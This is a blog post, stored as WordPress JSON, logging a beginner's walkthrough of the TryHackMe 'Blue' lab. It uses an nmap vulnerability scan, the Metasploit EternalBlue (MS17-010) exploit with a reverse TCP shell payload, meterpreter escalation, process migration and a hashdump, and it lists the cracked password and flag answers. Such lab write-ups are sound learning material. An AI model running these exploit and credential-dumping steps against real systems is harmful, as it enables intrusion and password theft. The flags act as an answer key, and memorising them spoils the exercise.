{"id":187,"date":"2023-04-21T18:03:32","date_gmt":"2023-04-21T10:03:32","guid":{"rendered":"https:\/\/zysgmzb.club\/?p=187"},"modified":"2023-04-21T18:08:50","modified_gmt":"2023-04-21T10:08:50","slug":"tryhackme%e9%9d%b6%e5%9c%ba%e8%ae%b0%e5%bd%95","status":"publish","type":"post","link":"https:\/\/zysgmzb.club\/index.php\/archives\/187","title":{"rendered":"TryHackMe practice range notes&#8211;blue"},"content":{"rendered":"<p>Newbie here; I keep seeing the pros recommend tryhackme, so I came to give it a try. I happen to want to learn some pentesting-related knowledge right now, so I'll work through some practice ranges.<\/p>\n<p>I skimmed through the basics first; now let's try the free rooms.<\/p>\n<h2>blue<\/h2>\n<h3>task1<\/h3>\n<p>Scan the machine.<\/p>\n<pre class=\"prettyprint linenums\" ><code>nmap -sV -vv --script vuln 10.10.222.121<\/code><\/pre>\n<p>How many ports are open with a port number under 1000?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/644217190d2dde57770a2193.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>3<\/code><\/pre>\n<p>What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)<\/p>\n<pre class=\"prettyprint linenums\" ><code>ms17-010<\/code><\/pre>\n<h3>task2<\/h3>\n<p>Start <a href=\"https:\/\/tryhackme.com\/module\/metasploit\">Metasploit<\/a><\/p>\n<p>Find the exploitation code we will run against the machine. What is the full path of the code?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/644218340d2dde57770baeb9.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>exploit\/windows\/smb\/ms17_010_eternalblue<\/code><\/pre>\n<p>Show options and set the one required value. 
What is the name of this value?<\/p>\n<pre class=\"prettyprint linenums\" ><code>RHOSTS<\/code><\/pre>\n<p>With that done, run the exploit!<\/p>\n<pre class=\"prettyprint linenums\" ><code>use exploit\/windows\/smb\/ms17_010_eternalblue\nset payload windows\/x64\/shell\/reverse_tcp\nset rhost 10.10.212.248\nset lhost 10.4.18.43\nrun<\/code><\/pre>\n<p>Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/6442243c0d2dde57771f54a7.jpg\" alt=\"\" \/><\/p>\n<h3>task3<\/h3>\n<p>If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)<\/p>\n<pre class=\"prettyprint linenums\" ><code>post\/multi\/manage\/shell_to_meterpreter<\/code><\/pre>\n<p>Select this (use MODULE_PATH). Show options, what option are we required to change?<\/p>\n<p>Set the required option, you may need to list all of the sessions to find your target here.<\/p>\n<p>Run! If this doesn't work, try completing the exploit from the previous task once more.<\/p>\n<p>Once the meterpreter shell conversion completes, select that session for use.<\/p>\n<p>Verify that we have escalated to NT AUTHORITY\\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.<\/p>\n<p>List all of the processes running via the 'ps' command. Just because we are system doesn't mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\\SYSTEM and write down the process id (far left column).<\/p>\n<p>Migrate to this process using the 'migrate PROCESS_ID' command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time.<\/p>\n<h3>task4<\/h3>\n<p>Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425d9a0d2dde57777de114.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>Jon<\/code><\/pre>\n<p>Copy this password hash to a file and research how to crack it. What is the cracked password?<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425dbc0d2dde57777e1dd6.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>alqfna22<\/code><\/pre>\n<h3>task5<\/h3>\n<p>Flag1? <em>This flag can be found at the system root.<\/em><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425ddd0d2dde57777e5604.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{access_the_machine}<\/code><\/pre>\n<p>Flag2? <em>This flag can be found at the location where passwords are stored within Windows.<\/em><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425df80d2dde57777e8277.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{sam_database_elevated_access}<\/code><\/pre>\n<p>flag3? <em>This flag can be found in an excellent location to loot. 
After all, Administrators usually have pretty interesting things saved.<\/em><\/p>\n<p><img decoding=\"async\" src=\"https:\/\/pic1.imgdb.cn\/item\/64425e0d0d2dde57777ea6aa.jpg\" alt=\"\" \/><\/p>\n<pre class=\"prettyprint linenums\" ><code>flag{admin_documents_can_be_valuable}<\/code><\/pre>\n<blockquote>\n<p>Without VIP this is just way too laggy, isn't it(<\/p>\n<\/blockquote>\n","protected":false},"excerpt":{"rendered":"<p>Newbie here; I keep seeing the pros recommend tryhackme, so I came to give it a try. I happen to want to learn some pentesting-related knowledge right now, so I'll work through some practice ranges. I skimmed through the basics first; now let's try the free rooms. blue task1 Scan the machine. nmap -sV -vv &#8211;script vuln 10.10.222.121 How many ports are open with a port number under 1000? 3 Wh [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-187","post","type-post","status-publish","format-standard","hentry","category-learn"],"_links":{"self":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/comments?post=187"}],"version-history":[{"count":3,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions"}],"predecessor-version":[{"id":190,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/posts\/187\/revisions\/190"}],"wp:attachment":[{"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/media?parent=187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/categories?post=187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zysgmzb.club\/index.php\/wp-json\/wp\/v2\/tags?post=187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}